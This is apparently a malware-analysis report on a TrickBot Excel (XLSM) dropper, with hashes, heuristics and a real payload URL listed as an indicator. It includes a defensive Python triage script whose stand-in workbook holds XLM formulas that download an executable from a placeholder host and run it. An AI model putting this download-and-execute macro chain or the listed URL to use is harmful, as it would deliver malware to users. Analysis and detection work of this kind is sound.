TrickBot — Office (OOXML) / .XLSM malware analysis

Static analysis result for SHA-256 80f34ac8c2bb698f…

MALICIOUS

Office (OOXML) / .XLSM

Size: 92.4 KB
Created: 2006-09-16 00:00:00 UTC (taken from the document's own core properties; the author controls this value, so it says nothing reliable about when the file was actually built)
Authoring application: Microsoft Excel 14.0300
MD5: fe721f290080445685d355d94c3611ec
SHA-1: 0f34b98a819170e58dbf849d64ab0ac2a8f2f68d
SHA-256: 80f34ac8c2bb698ff0c2754f44d18e84452135b31a5a12d2665da6e9204c780f
Risk score: 242

Malware Insights

TrickBot · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution

The file is an XLSM workbook carrying Excel 4.0 (XLM) macro sheets, a legacy macro format that predates VBA and is rarely used legitimately today. The macro sheets use the CALL and EXEC formula functions to download a second-stage payload from http://living-traditions.com/blogs/click.php and execute it; the workbook defines an Auto_Open name so the macro runs as soon as macros are enabled. The ClamAV signature match (Xls.Downloader.Trickbot07210-9880007-0) corroborates the TrickBot attribution.

Heuristics 5

  • Excel 4.0 macro sheet (3 sheet(s)) critical OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME
    Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
  • Dangerous XLM formula APIs: HALT, CALL, EXEC critical OOXML_XLM_DANGEROUS_FN
    The Excel 4.0 macro sheets use formula functions that reach outside the workbook without any VBA: =CALL and =REGISTER invoke exported functions in arbitrary Win32 DLLs (the usual way an XLM macro downloads a file), =EXEC starts a process, and =FORMULA writes formulas into cells at runtime, which is commonly used to assemble an obfuscated macro before it executes. =HALT only ends macro execution and is listed because it marks the end of the macro chain, not because it is dangerous by itself.
  • ClamAV: Xls.Downloader.Trickbot07210-9880007-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.Trickbot07210-9880007-0
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the channel through which each URL was reached (macro formula, JavaScript, link annotation, document body, XML namespace declaration, ...) determines whether it is an indicator.
    Network indicator (reached from the XLM macro formulas, see the summary above):
    • http://living-traditions.com/blogs/click.php
    XML namespace identifiers (declared in every OOXML part; not network indicators and not worth blocking):
    • http://schemas.openxmlformats.org/spreadsheetml/2006/main
    • http://schemas.microsoft.com/office/excel/2006/main
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac
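The three XLM heuristics above (macro sheet part present, _xlnm.Auto_Open defined name, dangerous formula functions) and the channel-labelled URL extraction can all be reproduced from the OOXML zip container with a few dozen lines of Python. The script below is an added example written for this page, not the analysis platform's own code: it builds a constructed stand-in workbook in memory (the real sample is not embedded, and the URL, file paths and sheet names in it are invented) and runs the checks against it, so it works offline and without opening the file in Excel.

```python
"""Static triage of an OOXML/XLSM workbook for Excel 4.0 (XLM) macro abuse.

Added example for this page, not the analysis platform's own code. It reproduces
the report's XLM heuristics (macro sheet present, Auto_Open defined name,
dangerous formula functions) and labels every extracted URL by the channel it
was found in, so XML namespace URIs are not mistaken for network indicators.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}
DANGEROUS_FN = {"CALL", "EXEC", "REGISTER", "FORMULA"}
AUTO_NAMES = {"_xlnm.Auto_Open", "_xlnm.Auto_Close"}
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")
FN_RE = re.compile(r"\b([A-Z][A-Z0-9.]*)\(")   # XLM function name followed by '('
# Every OOXML part declares namespace URIs under these hosts; they are identifiers, not C2.
SCHEMA_PREFIXES = ("http://schemas.openxmlformats.org/", "http://schemas.microsoft.com/office/")


def scan_xlsm(data: bytes) -> dict:
    """Return macro sheets, auto-exec names, XLM functions used, labelled URLs and heuristics."""
    zf = zipfile.ZipFile(io.BytesIO(data))
    names = zf.namelist()
    macrosheets = sorted(n for n in names if n.startswith("xl/macrosheets/") and n.endswith(".xml"))
    auto_exec, functions, formula_urls = [], set(), set()

    # Heuristic 2: an Auto_Open/Auto_Close defined name pointing into a macro sheet.
    if "xl/workbook.xml" in names:
        wb = ET.fromstring(zf.read("xl/workbook.xml"))
        for dn in wb.iterfind(".//m:definedNames/m:definedName", NS):
            if dn.get("name") in AUTO_NAMES:
                auto_exec.append((dn.get("name"), (dn.text or "").strip()))

    # Heuristic 3: walk every <c><f>formula</f></c> cell in each macro sheet.
    for sheet in macrosheets:
        root = ET.fromstring(zf.read(sheet))
        for f in root.iterfind(".//m:c/m:f", NS):
            text = f.text or ""
            functions.update(FN_RE.findall(text))
            formula_urls.update(URL_RE.findall(text))

    # URL extraction over all parts, with the channel each URL was reached through.
    urls = {}
    for name in names:
        for url in URL_RE.findall(zf.read(name).decode("utf-8", "replace")):
            if url in formula_urls:
                urls[url] = "macro-formula"
            elif url.startswith(SCHEMA_PREFIXES):
                urls[url] = "xml-namespace"
            else:
                urls[url] = "document-body"

    heuristics = []
    if macrosheets:
        heuristics.append(("OOXML_XLM_MACROSHEET", "critical"))
    if macrosheets and auto_exec:
        heuristics.append(("OOXML_XLM_AUTOOPEN_DEFINEDNAME", "critical"))
    if functions & DANGEROUS_FN:
        heuristics.append(("OOXML_XLM_DANGEROUS_FN", "critical"))
    if urls:
        heuristics.append(("EMBEDDED_URL", "info"))
    return {"macrosheets": macrosheets, "auto_exec": auto_exec, "functions": functions,
            "dangerous": sorted(functions & DANGEROUS_FN), "urls": urls, "heuristics": heuristics}


def build_sample() -> bytes:
    """Constructed stand-in for the analysed workbook (not the real sample; URL and paths invented)."""
    workbook = (
        '<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/>'
        '<sheet name="Macro1" sheetId="2" state="hidden" r:id="rId2"/></sheets>'
        '<definedNames><definedName name="_xlnm.Auto_Open">Macro1!$A$1</definedName></definedNames>'
        '</workbook>')
    macro = (
        '<macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetData>'
        '<row r="1"><c r="A1"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
        '"http://stage2.example.invalid/click.php","C:\\Users\\Public\\x.exe",0,0)</f></c></row>'
        '<row r="2"><c r="A2"><f>EXEC("C:\\Users\\Public\\x.exe")</f></c></row>'
        '<row r="3"><c r="A3"><f>HALT()</f></c></row>'
        '</sheetData></macrosheet>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("xl/workbook.xml", workbook)
        zf.writestr("xl/macrosheets/intlsheet1.xml", macro)
    return buf.getvalue()


if __name__ == "__main__":
    result = scan_xlsm(build_sample())
    for key in ("macrosheets", "auto_exec", "dangerous", "urls", "heuristics"):
        print(f"{key}: {result[key]}")
```

To triage a real file, replace build_sample() with the bytes of the .xlsm; the hidden sheet state and the per-cell formulas also tell you which cell Auto_Open lands on, which is where a manual walk of the macro should start. Formulas written at runtime by =FORMULA will not be visible to this static pass, which is exactly why that function is on the dangerous list.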

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename          Kind             Source                                       Size        SHA-256
emf_00.emf        ooxml-emf        OOXML EMF part: xl/media/image1.emf          1108 bytes  ab58818ae1864807b22f8a58a75f7fa8703ecb19a2352bdb47469f366b868e59
xlm_sheet_00.xml  xlm-macrosheet   OOXML XLM macro sheet: xl/macrosheets/intlsheet3.xml  1320 bytes  e4b281892d0ea349b67e22f5137ff45445837a231636a77def5d03453653a180
xlm_sheet_01.xml  xlm-macrosheet   OOXML XLM macro sheet: xl/macrosheets/intlsheet2.xml  1296 bytes  dc6f94d6a4ba861acb967e43bffdd40434a4af702aa49fecd339a534a914cf25
xlm_sheet_02.xml  xlm-macrosheet   OOXML XLM macro sheet: xl/macrosheets/intlsheet1.xml  1246 bytes  8faff306084010389946628f47b22e9cb5995393bc56355b17f2d18c3fd7944c